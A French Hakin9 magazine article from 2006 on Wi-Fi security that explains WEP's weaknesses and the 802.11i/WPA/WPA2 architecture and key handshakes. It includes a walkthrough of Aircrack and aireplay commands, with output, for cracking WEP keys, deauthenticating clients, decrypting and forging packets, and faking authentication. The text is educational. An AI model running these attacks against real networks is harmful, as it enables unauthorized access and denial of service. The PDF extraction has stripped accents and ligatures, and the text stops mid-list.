fr - wi-fi - wep, wpa et wpa2.pdf

7/24/2019 FR - Wi-Fi - WEP, WPA et WPA2.pdf

1/15

www.hakin9.orghakin9 N 1/20062

Dossier

Mme quand les mcanismes de scu-rit sont activs sur les quipementsWi-Fi, on constate dans la majorit

des cas qu'il s'agit du protocole de chiffrementWEP s'tant avr faillible. Dans cet article, nousexaminerons les failles du protocole WEP et lafacilit de casser le protocole. L'inadquation duWEP souligne les besoins d'une nouvelle archi-tecture de scurit : la norme IEEE 802.11i, quenous dtaillerons avec les implmentations duWPA et du WPA2, leurs premires vulnrabilits

mineures et leurs implmentations dans les sys-tmes d'exploitation.

La mort du WEPLe WEP (Wired Equivalent Privacy) est le pro-tocole de chiffrement par dfaut introduit dansla 1renorme 802.11 datant de 1999. Il est bassur l'algorithme de chiffrement RC4 avec une clsecrte de 40 ou 104 bits combine un vec-teur d'initialisation (Initialisation Vector IV) de24 bits an de chiffrer un message en clair M etsa somme de contrle (checksum) l'ICV (Inte-

grity Check Value). Le message chiffr est alorsdtermin en utilisant la formule suivante :

C= [ M|| ICV(M) ] + [ RC4(K|| IV) ]

o || reprsente l'oprateur de concatnationet + l'oprateur XOR. Le vecteur d'initialisationest la cl de vote de la scurit du WEP, pourmaintenir un niveau dcent de scurit et viterla fuite d'information l'IV doit tre incrmentpour chaque paquet an que le paquet suivantsoit chiffr avec une cl diffrente. Malheureu-sement pour la scurit du protocole, l'IV esttransmis en clair et le standard 802.11 ne rendpas obligatoire l'incrmentation de l'IV laissantcette mesure de scurit au bon vouloir de

Scurit Wi-Fi WEP, WPAet WPA2

Guillaume Lehembre

Degr de difcult

Le Wi-Fi (Wireless Fidelity) est une des technologies sans

l dominante actuellement avec un support de plus en plus

intgr dans les quipements : ordinateurs portables, agendas

lectroniques, tlphones portables, etc. Malheureusement,

un aspect de la conguration est souvent oubli et mconnu :

la scurit. Voyons un peu le niveau de scurit des diffrents

systmes de chiffrement pouvant tre utiliss dans les

implmentations modernes du Wi-Fi.

Cet article explique...

les failles du protocole WEP, une vue globale de la norme 802.11i et de ses

implmentations commerciales : le WPA et leWPA2,

les notions de base du 802.1x, les failles potentielles du WPA et du WPA2.

Ce qu'il faut savoir...

les notions de base des protocoles TCP/IP etWi-Fi, les notions de base de la cryptograpie.


2/15

Scuri t WEP, WPA et WPA2

hakin9 N 1/2006www.hakin9.org 13

l'quipement sans l (point d'accsou carte sans l).

La brve histoire du WEPLe protocol WEP ne fut pas cr pardes experts scurit ou du monde dela cryptographie, il s'avra faillible un problme de l'algorithme RC4dcrit par David Wagner quatre ansauparavant. En 2001, Scott Fluhrer,Itsik Mantin et Adi Shamir (FMS pourfaire court) publirent leur fameuxpapier sur la scurit WEP danslequel ils dtaillaient deux vulnra-bilits dans l'algorithme de chiffre-ment RC4: l'invariance weaknesses

et l'attaque par IV connu. Ces deuxattaques reposent sur le fait quepour certaines valeurs de la cl, il estpossible pour les 1erbits de la suitechiffrante de dpendre uniquementde quelques bits de la cl (normale-ment chaque bit de la suite chiffrantea 50% de chance d'tre diffrent dubit de la suite chiffrante prcdente).Comme la cl est compose de laconcatnation d'une cl secrteet de l'IV, certaines valeurs de cet IVgnrent des cls dites faibles.

Ces vulnrabilits furent exploi-tes par des outils de scurit tel Air-snort, permettant de retrouver la clWEP en analysant une importantequantit de trac chiffr. Cette atta-que se rvlait fructueuse dans untemps raisonnable sur des rseauxsans l assez charg au niveau tracmais ncessitait un temps de calculassez long. David Hulton (h1kari)dcouvrit une amlioration de l'at-taque prcdente en ne prenant

pas uniquement en considration le1er octet de la sortie de l'algorithmeRC4 (comme dans la mthode FMS)mais aussi les suivants, cela permet-tant de rduire signicativement laquantit de donnes capturer pourl'analyse.

Le contrle d'intgrit souffreaussi de srieuses failles des l'uti-lisation de l'algorithme CRC32 choisipour cette tche. Cet algorithme estfrquemment utilis pour la dtection

d'erreurs mais n'a jamais t consi-dr cryptographiquement sr pourdu contrle d'intgrit cause de salinarit, c'est ce que Nikita Borisov,

Ian Goldberg et David Wagner souli-gnait dj en 2001.

Il tait alors admis que le WEPfournissait une scurit acceptable

pour les particuliers et les applica-tions non critiques. Cette afrmationa t dmentie avec l'apparition del'attaque de KoreK en 2004 (gnra-lisant l'attaque FMS en incluant lesoptimisation proposes par h1kari),et l'attaque inductive inverse deArbaugh permettant le dcryptagearbitraire d'un paquet sans connais-sance de la cl et l'injection depaquets. Des outils de cassage decls tel que Aircrack de ChristopheDevine ou Weplab de Jos IgnacioSnchez implmentrent ces nou-velles attaques et furent en mesurede casser une cl WEP 128 bits enmoins de 10 minutes (ce temps pou-vant tre along suivant le point d'ac-cs et la carte sans l utilise).

Le fait d'injecter des paquets apermis de diminuer sensiblementle temps ncessaire pour casser leWEP, l'attaque ne ncessitant pas

la capture de millions de tramesmais simplement un certain nombrede paquets avec des IV uniques partir de 150 000 paquets pour unecl WEP 64 bits et 500 000 paquetspour une cl WEP de 128 bits. Grce l'injection de paquets, la collecte dunombre ncessaire d'information n'estplus qu'une question de minutes. Do-rnavant, le WEP peut tre considrmort (voir le Tableau 1) et ne devraitplus tre utilis, mme si une rotationdes cls a t mise en place.

Les failles du WEP peuvent sersumer ainsi:

faiblesse de l'algorithme RC4 ausein du protocole WEP de laconstruction de la cl,

Figure 1. Le protocole de chiffrement WEP

Tableau 1. Chronologie de la mort du WEP

Date Description

Septembre 1995 Vulnrabilit potentielle dans RC4 (Wagner)

Octobre 2000 Premire publication sur les faiblesses du WEP :Unsafe at any key size; An analysis of the WEP

encapsulation(Walker)

Mai 2001 An inductive chosen plaintext attack against WEP/WEP2(Arbaugh)

Juillet 2001 Attaque bit ippingsur le CRC Intercepting MobileCommunications : The Insecurity of 802.11(Borisov,Goldberg, Wagner)

Aot 2001 Attaques FMS Weaknesses in the Key SchedulingAlgorithm of RC4(Fluhrer, Mantin, Shamir)

Aot 2001 Sortie de AirSnort

Fvrier 2002 Optimisation de l'attaque FMS par h1kari

Aot 2004 Attaque de KoreK (IVs uniques) sortie de chopchop

et chopperJuillet/Aot 2004 Sortie d'Aircrack (Devine) et WepLab (Sanchez )

implmentant l'attaque de KoreK.


3/15

hakin9 N 1/2006 www.hakin9.org

Dossier

4

la taille alloue aux IV est trop fai-ble (24 bits moins de 5000 pa-quets sont ncessaire pour avoir50% de chance de collision) et larutilisation des IV est autorise(pas de protection contre le rejeudes messages),

aucun vrai contrle d'intgrit (leCRC32 est normalement utilispour la dtection d'erreur et n'estpas une fonction cryptographiquepour l'intgrit du fait de sa lina-rit),

aucun mcanisme interne de mi-se jour des cls n'est prsent.

Cassage de cl WEP en

utilisant Aircrack

Des attaques pratiques contre le WEPpeuvent tre facilement menes grce des outils tel que Aircrack (outil crpar le chercheur franais en scuritChristophe Devine). Aircrack est unesuite d'outils compose de 3 princi-

paux binaires tant utilis conjointe-ment pour retrouver la cl :

airodump : outil de capture r-seau utilis pour dcouvrir lesrseaux WEP environnants,

aireplay : outil pour injecter arti-ciellement du trac,

aircrack : casseur de cl WEPutilisant les IVs uniques collectspralablement.

L'injection de trac utilisant aireplayn'est supporte que sur une certainnombre de puce Wi-Fi, le supportpour l'injection en mode moniteur

ncessite la dernire version despilotes modis. Ce mode estl'quivalent du mode promiscuousdes rseaux laires dans lequel onvite le rejet des paquets n'tantpas destination de la machine setrouvant dans ce mode (ceci estgnralement effectu au niveau dela couche physique du modle OSI)autorisant ainsi la capture de tous lespaquets. Avec des pilotes modis, ilest possible d'injecter et de capturersimultanment le trac en utilisantune seule carte sans l.

Le but de l'attaque est de gnrerdu trac an de capturer des IVs uni-ques transmis entre un client lgitimeet le point d'accs. Certaines don-nes chiffres sont facilement d-tectables car elles ont des longueursxes, des adresses destinationsxes, etc. C'est le cas par exempledes requtes ARP (voir lEncadrRequte ARP envoyes l'adresse

destination de diffusion (FF:FF:FF:FF:FF:FF) avec une taille xe de68 octets. Ces requtes ARP peu-vent tre rejoues an de gnrerdes rponses ARP d'un client lgi-time, ces messages tant chiffrsavec de nouveaux IVs.

Dans les exemples suivants,00:13:10:1F:9A:72 est l'adresseMAC du point d'accs (BSSID) sur lecanal 1 avec le SSID hakin9demoet00:09:5B:EB:C5:2B l'adresse MAC

du client sans l (utilisant le WEPou WPA-PSK suivant les cas). Laplupart des commandes ncessitentles privilges root.

La 1re tape consiste activerle mode moniteur sur les cartessans l (ici un modle bas sur uncomposant Atheros) an de captu-rer tous le trac (voir le Listing 1).L'tape suivante permet de dcouvrirles rseaux sans l environnants enscannant les 14 canaux utiliss parles rseaux Wi-Fi (voir le Listing 2).

Le rsultat du Listing 2 peut treinterprt de la faon suivante :un point d'accs avec le BSSID00:13:10:1F:9A:72 utilise le protocolWEP sur le canal 1 avec le SSIDhakin9demo, un client identi par laMAC 00:0C:F1:19:77:5C est associet authenti sur ce rseau sans l.

Une fois le rseau cible de l'at-

taque repr, la capture doit treralise sur le canal adquat pourviter de perdre des paquets lorsdu passage sur les autres canaux.Cette tape fournit une sortie simi-laire l'tape prcdente :

# airodump ath0 wep-crk 1

Ensuite, il est possible de lancerl'injection de trac avec aireplay enutilisant les informations prcdem-

ment dcouvertes. L'injection com-mencera ds qu'une requte ARPcorrespondant au BSSID attaqusera capture sur le rseau sans l :

Requte ARPLe protocole ARP (Address ResolutionProtocol RFC826) est utilis pour fai-

re la correspondance entre des adres-ses IP sur 32 bits et l'adresse Ethernetsur 48 bits (les rseaux Wi-Fi utilisentaussi le protocole Ethernet). Par exem-ple, quand une machine A (192.168.1.1)veut communiquer avec une machineB (192.168.1.2), l'adresse IP connue deB doit tre traduite avec son adresseMAC correspondante. Pour ralisercel, la machine A envoie un messageen diffusion contenant l'adresse IP dela machine B (Who has 192.168.1.2?Tell 192.168.1.1). La machine cible, re-

connaissant que l'adresse IP du paquetcorrespond la sienne, retourne unerponse rvlant son adresse MAC(192.168.1.2 is at 01:23:45:67:89:0A).La rponse est gnralement mise encache.

Listing 1.Activation du mode moniteur

# airmon.sh start ath0

Interface Chipset Driver

ath0 Atheros madwi (monitor mode enabled)

Listing 2. Dcouverte des rseaux et des clients Wi-Fi environnants

# airodump ath0 wep-crk 0

BSSID PWR Beacons # Data CH MB ENC ESSID

00:13:10:1F:9A:72 62 305 16 1 48 WEP hakin9demo

BSSID STATION PWR Packets ESSID

00:13:10:1F:9A:72 00:0C:F1:19:77:5C 56 1 hakin9demo


4/15



# aireplay -3 \

-b 00:13:10:1F:9A:72 \

-h 00:0C:F1:19:77:5C \

-x 600 ath0

(...)

Read 980 packets

(got 16 ARP requests),

sent 570 packets...

L'tape nale consiste a utiliser air-crack pour casser la cl WEP. Il estpossible de lancer cette tape sur lechier pcap alors que airodump cap-ture toujours le trac (voir les rsul-tats d'aircrack sur la Figure 2) :

# aircrack -x -0 wep-crk.cap

Autres typesd'attaques bases surAircrackD'autres attaques intressantespeuvent tre ralises avec Aircrack.Voyons quelques unes d'entre elles.

Attaque 2 : D-authenticationCette attaque peut tre conduite pourdcouvrir un SSID cach (i.e. unidentiant non diffus), pour capturerle 4-Way Handshake WPA ou pourraliser un dni de service (le sujetsera abord plus loin dans la partie802.11i). Le but de cette attaque estde forcer la r-authentication desclients, elle est rendue possible parle manque d'authentication destrames de contrle (utilises pourl'authentication, l'association, etc.)permettant un attaquant d'usurperles adresses MAC.

Un client sans l peut tre d-authenti en utillisant la commandesuivante, cette dernire usurpantl'adresse MAC du BSSID pour en-voyer un paquet de d-authentica-tion l'adresse MAC du client vis :

# aireplay -0 5

-a 00:13:10:1F:9A:72

-c 00:0C:F1:19:77:5C

ath0

Une d-authentication massive estaussi possible (mais pas toujourstrs able) en usurpant continuel-lement le BSSID et en envoyant les

paquets de d-authentication l'adresse de diffusion:

# aireplay -0 0

-a 00:13:10:1F:9A:72

ath0

Attaque 3 : Dcrypter unpaquet chiffr avec le

protocole WEP sans connatrela clCette attaque est base sur la preuvede concept publie par KoreK appel-le chopchop pouvant dcrypter unpaquet chiffr avec le protocole WEPsans avoir connaissance de la cl. Lecontrle d'intgrit implment dans leprotocole WEP permet un attaquantde modier la fois le contenu chiffrdu paquet et le CRC correspondant.De plus, l'utilisation de l'oprateurXOR au sein du protocole WEP im-

plique qu'un octet dans le messagechiffr dpend toujours du mme octetdu texte en clair. En coupant le mes-sage chiffr de son dernier octet, lemessage devient corrompu mais il estpossible de faire un choix sur la valeurde l'octet correspondant du texte enclair et de corriger le texte chiffr.

Si le paquet corrig est rinjectsur le rseau, il sera supprim parle point d'accs si le choix fait estincorrect (dans ce cas un nouveau

choix doit tre fait) mais pour un choixcorrect il relayera le paquet comme son habitude. En rptant l'attaquesur tous les octets du message chiffr,

il est possible de dcrypter l'intgra-lit du paquet et de retrouver la suitechiffrante associe. Il est important denoter que l'incrmentation de l'IV n'estpas obligatoire dans le protocole WEP,il est donc possible de rutiliser la suitechiffrante pour usurper d'autres pa-quets (en r-utilisant le mme IV).

La carte sans l doit tre basculedans le mode moniteur sur le canaladquat (voir l'exemple prcdentpour la dmarche suivre). L'atta-que doit tre lance contre un clientlgitime (toujours 00:0C:F1:19:77:5Cdans notre cas), aireplay informeral'attaquant de chaque paquet chiffrqu'il capturera (voir le Listing 3). Deuxchiers pcap sont crs : un pourle paquet dchiffr et l'autre pour lasuite chiffrante associe. Le chierde donnes rsultant peut tre lu parun lecteur adquat (nous utiliserons

tcpdump) voir le Listing 4 pour unping chang entre deux machines.

Une fois la suite chiffrante captu-re, il est possible d'usurper n'importequel paquet chiffr. Ici une requteARP envoye de 192.168.2.123 (00:0C:F1:19:77:5C) 192.168.2.103 :

# arpforge \

replay_dec-0916-114019.xor \

1 \

00:13:10:1F:9A:72 \

00:0C:F1:19:77:5C \ 192.168.2.123 \

192.168.2.103 \

forge-arp.cap

Figure 2. Rsultat d'Aircrack aprs quelques minutes


5/15


Dossier

6

Finalement, aireplay peut tre uti-lis pour rejouer ce paquet (voir leListing 5).

Cette mthode est moinsautomatique que l'attaque propre Aircrack de construction de re-qute ARP (l'option -1) mais elle estbeaucoup plus modulaire l'atta-quant peut utiliser la suite chiffrantequ'il a dcouverte pour forger n'im-porte quel paquet dont la taille estinfrieure la suite chiffrante (dansle cas contraire il doit l'agrandir).

Attaque 4 : Fausse

authentication

Les mthodes pour casser le proto-cole WEP nonces prcdemment(Attaque 1 3) ncessitent un clientsans l lgitime (physique ou virtuel,un client physique tant gnralementplus adquat) associ au point d'accspour que ce dernier ne supprime pasles paquets cause d'une adresse dedestination d'un client non associ.

Si une authentication ouverteest utilise, n'importe quel clientpeut s'authentier et s'associer sur

le point d'accs, ce dernier suppri-mant ensuite les paquets non en-voys avec la bonne cl WEP. Dansl'exemple de la Listing 6, aireplay est

utilis pour falsier une demanded'authentication et d'associationpour le SSID hakin9demo (BSSID:00:13:10:1F:9A:72) avec l'adresseMAC usurpe 0:1:2:3:4:5.

Certaines bornes ncessitent lar-assocition du client toutes les 30

secondes. Ce comportement peuttre imit par aireplay en remplaantla seconde option (0) par 30.

La norme 802.11iEn janvier 2001, le groupe de travaili fut cre l'IEEE pour amliorerl'authentication et le chiffrement desdonnes au sein des rseaux 802.11.En avril 2003, la Wi-Fi Alliance (uneassociation promouvant et certiantles quipements Wi-Fi) publia une re-commandation pour rpondre aux in-quitudes des entreprises concernantla scurit des rseaux sans l. Cesderniers taient aussi au courant que

les clients n'taient pas prt rempla-cer leurs quipements existants.

En Juin 2004, la version nalede la norme 802.11i fut adopte etle nom commercial WPA2 fut choisipar la Wi-Fi Alliance. La norme IEEE802.11i introduit des changementsfondamentaux comme la sparationde l'authentication utilisateur et lechiffrement/contrle d'intgrit desmessages, cel permettant unearchitecture de scurit robustepassant l'chelle et convenant par-faitement tant aux entreprises qu'auxparticuliers. La nouvelle architecturepour les rseaux sans l est appelle

Listing 3. Dcryptage d'un paquet WEP sans connaissance pralable

de la cl

# aireplay -4 -h 00:0C:F1:19:77:5C ath0Read 413 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:13:10:1F:9A:72

Dest. MAC = 00:13:10:1F:9A:70

Source MAC = 00:0C:F1:19:77:5C

0x0000: 0841 d500 0013 101f 9a72 000c f119 775c .A.......r....w\

0x0010: 0013 101f 9a70 c040 c3ec e100 b1e1 062c .....p.@.......,

0x0020: 5cf9 2783 0c89 68a0 23f5 0b47 5abd 5b76 \.'...h.#..GZ.[v

0x0030: 0078 91c8 adfe bf30 d98c 1668 56bf 536c .x.....0...hV.Sl

0x0040: 7046 5fd2 d44b c6a0 a3e2 6ae1 3477 74b4 pF_..K....j.4wt.

0x0050: fb13 c1ad b8b8 e735 239a 55c2 ea9f 5be6 .......5#.U...[.

0x0060: 862b 3ec1 5b1a a1a7 223b 0844 37d1 e6e1 .+>.[...";.D7...

0x0070: 3b88 c5b1 0843 0289 1bff 5160 ;....C....Q`

Use this packet ? y

Saving chosen packet in replay_src-0916-113713.capOffset 123 ( 0% done) | xor = 07 | pt = 67 | 373 frames written in 1120ms

Offset 122 ( 1% done) | xor = 7D | pt = 2C | 671 frames written in 2013ms

(...)

Offset 35 (97% done) | xor = 83 | pt = 00 | 691 frames written in 2072ms

Offset 34 (98% done) | xor = 2F | pt = 08 | 692 frames written in 2076ms

Saving plaintext in replay_dec-0916-114019.cap

Saving keystream in replay_dec-0916-114019.xor

Completed in 183s (0.47 bytes/s)

Listing 4. Lecture d'un chier pcap issu de l'attaque 3

# tcpdump -s 0 -n -e -r replay_dec-0916-114019.cap

reading from le replay_dec-0916-114019.cap, link-type IEEE802_11 (802.11)

11:40:19.642112 BSSID:00:13:10:1f:9a:72

SA:00:0c:f1:19:77:5c DA:00:13:10:1f:9a:70

LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000),

ethertype IPv4 (0x0800): 192.168.2.103 > 192.168.2.254:

ICMP echo request, id 23046, seq 1, length 64

Listing 5. Rejeu d'un paquet forg

# aireplay -2 -r forge-arp.cap ath0

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:13:10:1F:9A:72

Dest. MAC = FF:FF:FF:FF:FF:FF

Source MAC = 00:0C:F1:19:77:5C

0x0000: 0841 0201 0013 101f 9a72 000c f119 775c .A.......r....w\

0x0010: ffff ffff ffff 8001 c3ec e100 b1e1 062c ...............,

0x0020: 5cf9 2785 4988 60f4 25f1 4b46 1ab0 199c \.'.I.`.%.KF....

0x0030: b78c 5307 6f2d bdce d18c 8d33 cc11 510a ..S.o-.....3..Q.

0x0040: 49b7 52da I.R.

Use this packet ? ySaving chosen packet in replay_src-0916-124231.cap

You must also start airodump to capture replies.

Sent 1029 packets...


6/15



RSN (Robust Security Network) etutilise l'authentication 802.1X, larotation et la distribution des cls etde nouveaux mcanismes d'intgrit

et de chiffrement.Bien que l'architecture RSN soit

plus complexe, elle a le mrite deproposer une solution scurise pou-vant passer facilement l'chelle. UnRSN devrait typiquement accepteruniquement des quipements ca-pables de supporter les RSN maisl'IEEE 802.11i a aussi dni une archi-tecture temporaire TSN (TransitionalSecurity Network) dans laquelle lesquipements RSN et les systmes

WEP peuvent coexister permettantainsi aux utilisateurs de mettre jourleurs quipements. Si la procdured'authentication ou d'associationutilise entre deux stations est bassur le 4-Way Handshake, l'associationest appelle RSNA (Robust SecurityNetwork Association).

Un contexte de communicationscuris s'effectue en quatre phases(voir la Figure 4) :

la mise en accord sur la politiquede scurit,

l'authentication 802.1X, la drivation et la distribution des

cls, le chiffrement et l'intgrit au sein

d'une RSNA.

Phase 1 : Mise en accord surla politique de scurit

La premire phase permet aux deuxparties communicantes de s'accordersur la politique de scurit utiliser.Les politiques de scurit supportespar le point d'accs sont diffusesdans les trames Beacon et ProbeResponse(suivant un message ProbeRequest du client). Une authentica-tion ouverte standard constitue l'tapesuivante (comme celle utilise dansles rseaux TSN, cette authentica-tion est toujours positive). La rponsedu client aux politiques de scuritsupportes est incluse dans le mes-

sage Association Request valid parle message Association Responsedu point d'accs. Les informations dela politique de scurit sont envoyesdans le champ RSN IE (InformationElement) dtaillant :

les mthodes d'authentication

supportes (802.1X, cl pr-par-tage (PSK)),

le protocole de scurit pourle chiffrement du trac versune seule destination (unicast)(CCMP, TKIP, etc.) suite dechiffrement pairwise,

le protocole de scurit pour lechiffrement du trac en diffusion(multicast) (CCMP, TKIP, etc.) suite de chiffrement de groupe,

le support de la pr-authentica-tion permettant aux utilisateursde se pr-authentier avant de

Listing 6. Fausse authentication

# aireplay -1 0 -e hakin9demo -a 00:13:10:1F:9A:72 -h 0:1:2:3:4:5 ath0

18:30:00 Sending Authentication Request

18:30:00 Authentication successful

18:30:00 Sending Association Request

18:30:00 Association successful

IEEE 802.1X et EAP

Le procotole d'authentication 802.1X (aussi connu sous le nom

de contrle d'accs bas sur le port (Port-Based Network Access

Control)) est un cadre de travail dvelopp initialement pour le

rseau laire fournissant l'authentication, l'autorisation, les m-

chanismes de distribution des cls en implmentant un contrle

d'accs pour les utilisateurs se connectant au rseau. L'architec-

ture 802.1X est consitue de trois entits fonctionnelles :

le client 802.1X (supplicant) voulant joindre le rseau, le contrleur (authentifcator) contrlant l'accs au rseau,

le serveur d'authentication (authentication server) prenant

les dcisions d'autorisation.

Dans les rseaux sans l, le point d'accs joue le rle de contr-

leur. Chaque port physique (port virtuel dans le cas des rseaux

sans l) est divis en deux ports logiques appells PAE (Port

Access Entity). Le PAE d'authentication est toujours ouvert et

autorise toutes les trames d'authentication le traverser tandis

que le PAE de service est uniquement ouvert aprs une authenti-

cation russie (i.e. dans un tat autoris) pour une dure limite

(3600 secondes par dfaut). La dcision relative l'accs revient la troisime entit appelle serveur d'authentication (qui peut

tre soit un serveur Radius ddi ou par exemple pour les parti-

culier un simple processus fonctionnant sur le point d'accs). La

Figure 3 illustre comment ses entits communiquent entre elles.

La norme 802.11i apporte quelques modications la norme

IEEE 802.1X pour l'adapter aux rseaux sans ls et en particulier

pour la protger du vol d'identit. L'authentication des messages

a t incluse pour garantir que le client 802.1X et le contrleur (la

borne) calculent correctement leurs cls secrtes et activent le

chiffrement avant de communiquer sur le rseau.

Le client 802.1X et le contrleur communiquent en utilisantun protocole bas sur EAP. Il est important de comprendre que

le contrleur joue un rle passif il transmet simplement tous les

messages au serveur d'authentication. EAP est un cadre de tra-

vail pour le transport de mthodes d'authentication varies bas

sur un nombre limit de messages (Request, Response, Success,

Failure), tandis que les messages intermdiaires sont dpendant

de la mthode d'authentication slectionne: EAP-TLS, EAP-

TTLS, PEAP, Kerberos V5, EAP-SIM, etc. Quand le processus

complet est achev, les deux entits (i.e. le client 802.1X et le

serveur d'authentication) partagent une cl matresse secrte.

Le protocole utilis dans les rseaux sans ls pour transporter

EAP s'appelle EAPOL (EAP Over LAN), les communicationsentre le contrleur et le serveur d'authentication utilisent des

protocoles de plus haut niveau tel que Radius, etc.


7/15


Dossier

8

basculer sur un nouveau pointd'accs pour un handover en

douceur.

La Figure 5 illustre cette premirephase.

Phase 2 : Authentication

802.1X

La seconde phase consiste enl'authentication 802.1X base surEAP et la mthode spcique choi-sie: EAP/TLS avec certicat client

et serveur (ncessitant une infras-tructure cl publique), EAP/TTLSou PEAP pour des authenticationshybrides (o le certicat est unique-

ment ncessaire ct serveur) etc.L'authentication 802.1X est initielorsque le point d'accs demandeles donnes d'identication du client,la rponse du client contient alors lamthode d'authentication prfre.Diffrents messages dpendant dela mthode spcique choisie sontalors changs par la suite entre leclient et le serveur d'authenticationan de gnrer une cl matresse(Master Key MK). la n de la pro-

cdure, un message Radius Acceptest envoy du serveur d'authenti-cation au point d'accs contenant laMK ainsi qu'un message nal EAPSuccess pour le client. La Figure 6illustre cette seconde phase.

Phase 3 : Hirarchie et

distribution des cls

La scurit des transmissions reposeessentiellement sur des cls secrtes.Dans les RSN, chaque cl a une du-re de vie limite et de nombreusescls sont utilises, organises dansune hirarchie. Quand un contexte descurit est tabli aprs une authenti-cation russie, des cls temporaires(de sessions) sont cres et rgulire-ment mises jour jusqu' la fermeturedu contexte. La gnration et l'chan-ge des cls est le but de cette troi-sime phase. Deux poignes de main(Handshake) ont lieu pour driver lesdiffrentes cls (voir la Figure 7) :

Le 4-Way Handshake pour ladrivation de la PTK (PairwiseTransient Key) et de la GTK(Group Transient Key),

Le Group Key Handshakepour lerenouvellement de la GTK.

La drivation de la PMK (PairwiseMaster Key) dpend de la mthoded'authentication choisie :

si la PSK (Pre-Shared Key) est

utilise, PMK = PSK. La PSKest gnre partir de la phrasesecrte (compose de 8 63 ca-ractres) ou directement partir

Figure 3. Modle IEEE 802.1X issu de la norme IEEE 802.1X

Figure 4. Les phases oprationnelles du 802.11i

Figure 5. Phase 1 : La mise en accord sur la politique de scurit


8/15



d'une chane de 256 bits, cettemthode est adapte pour lesparticuliers n'ayant pas de ser-veur d'authentication,

si un serveur d'authenticationest utilis, la PMK est drive dela MK issue de l'authentication802.1X.

La PMK en elle mme n'est jamaisutilise pour le chiffrement ou lecontrle d'intgrit. Nanmoins, elleest utilise pour la gnration de clsde chiffrement temporaires pour letrac destination d'une machine ils'agit de la PTK (Pairwise Transient

Key). La taille de la PTK dpenddu protocol de chiffrement choisi :512 bits pour TKIP et 384 bits pourCCMP. La PTK consiste en plusieurscls temporelles ddies :

KCK (Key Conrmation Key 128 bits) : Cl pour authentierles messages (MIC) durant le4-Way Handshake et le GroupKey Handshake,

KEK (Key Encryption Key 128 bits) : Cl pour la con-dentialit des donnes durant le4-Way Handshake et le GroupKey Handshake,

TK (Temporary Key 128 bits) :Cl pour le chiffrement desdonnes (utilise dans TKIP ouCCMP),

TMK (Temporary MIC Key 2x64 bits) : Cl pour l'authenti-cation des donnes (utilise seu-lement par Michael dans TKIP).Une cl ddie est utilise pour

chaque sens de communication.

Cette hirarchie peut tre rsumeen Figure 8.

Le 4-Way Handshake, initi par lepoint d'accs, permet :

de conrmer la connaissance dela PMK par le client,

de driver une nouvelle PTK, d'installer les cls de chiffrement

et d'intgrit,

de chiffrer le transport de laGTK, de conrmer la suite de chiffre-

ment choisie.

Quatre messages EAPOL-Key sontchangs entre le client et le pointd'accs durant le 4-Way Handshake.Voyez la Figure 9.

La PTK est drive de la PMK,d'une chane de caractre xe, del'adresse MAC du point d'accs,de l'adresse MAC du client et de

Figure 6. Phase 2 : L'authentication 802.1X

Figure 7. Phase 3 : Drivation et distribution de cl

Figure 8. Phase 3 : Hirarchie de cl Pairwise


9/15


Dossier

0

deux nombres alatoires (ANonceet SNonce, gnrs respectivementpar le contrleur et le client). Le pointd'accs initie le premier messageen choisissant un nombre alatoire

Anonce puis l'envoie au client sansle chiffrer et l'authentier. Le client

gnre ensuite son propre nombrealatoire SNonce et est maintenanten mesure de calculer la PTK et dedriver les cls temporelles, il envoie

donc SNonce et le MIC calcul surle second message en utilisant lacl KCK. Quand le contrleur re-oit le deuxime message, il peutextraire SNonce (car le messagen'est pas chiffr) et calculer la PTKpuis driver les cls temporelles. Il

est maintenant en mesure de vrierla valeur du MIC contenu dans lesecond message, il s'assure ainsique le client connait la PMK et a cor-

rectement driv la PTK puis les clstemporelles.

Le troisime message est envoypar le contrleur au client et contient

la GTK (chiffre avec la cl KEK),drive d'une GMK et d'un GNoncealatoire (voir la Figure 10 pour desdtails), accompagne d'un MICcalcul sur le troisime message enutilisant la cl KCK. Quand le clientreoit ce message, le MIC est vripour s'assurer que le contrleur con-nait la PMK et qu'il a correctementdriv la PTK puis les cls tempo-relles.

Le dernier message acquitte

la russite de tous le Handshakeet indique que le client a correcte-ment install les cls et qu'il est prt commencer le chiffrement desdonnes. Aprs rception du mes-sage, le contrleur installe ses clset vrie la valeur du MIC. De cettefaon, le client mobile et le point d'ac-cs ont obtenus, calculs et installsles cls de chiffrement et d'intgritet sont maintenant en mesure decommuniquer sur un canal sr pourle trac destination d'une machineou en diffusion.

Le trac en diffusion est protgpar une autre cl, la GTK (GroupTransient Key), gnre partird'une cl matresse GMK (GroupMaster Key), d'une chane xe, del'adresse MAC du point d'accset d'un nombre alatoire GNonce. Lalongueur de la GTK dpend du pro-tocole de chiffrement 256 bits pourTKIP et 128 bits pour CCMP. La GTKest divise en des cls temporelles

ddies :

GEK (Group Encryption Key) :Cl pour le chiffrement des don-nes (utilise par CCMP pourl'authentication et le chiffrementet par TKIP),

GIK (Group Integrity Key) : Clpour l'authentication des don-nes (utilise seulement parMichael avec TKIP).

Cette hirarchie peut tre rsumeen Figure 10.Deux messages EAPOL-Key

sont changs entre le client et le

Figure 9. Phase 3 : 4-Way Handshake

Figure 10. Phase 3 : Hirarchie de cl de groupe


10/15



point d'accs durant le Group KeyHandshake. Cette poigne de mainse base sur les cls temporelles g-nres durant le 4-Way Handshake

(la KCK et la KEK). Ce processus estillustr en Figure 11.

Le Group Key Handshake estseulement ncessaire en cas de d-sassociation d'un client ou lors du re-nouvellement de la GTK suite unedemande client. Le contrleur initiele premier message en choisissant lenombre alatoire GNonceet en cal-culant une nouvelle GTK. Il envoie laGTK chiffre (en utilisant la KEK), lenumro de squence de la GTK et le

MIC calcul sur ce message grce la KCK au client. Quand le messageest reu par le client, le MIC est vri- et la GTK dchiffre.

Le second message acquitte larussite du Group Key Handshakeen envoyant le numro de squencede la GTK et le MIC calcul sur cesecond message. Aprs rceptiondu message, le contrleur installe lanouvelle GTK (aprs avoir vri lavaleur du MIC).

UneSTAkey Handshake

existeaussi, mais elle ne sera pas dtailleici. Elle permet la gnration d'unecl transitoire appelle STAkey l'aide du point d'accs pour les con-nexions de type ad-hoc.

Phase 4 : Chiffrement etintgrit au sein d'une RSNAToutes les cls gnres prcdem-ment sont utilises dans les protoco-les de chiffrement et d'intgrit ausein d'une RSNA :

TKIP (Temporal Key Hash), CCMP (Counter-Mode/Cipher

Block Chaining Message Authen-

tication Code Protocol), WRAP (Wireless Robust Authen-

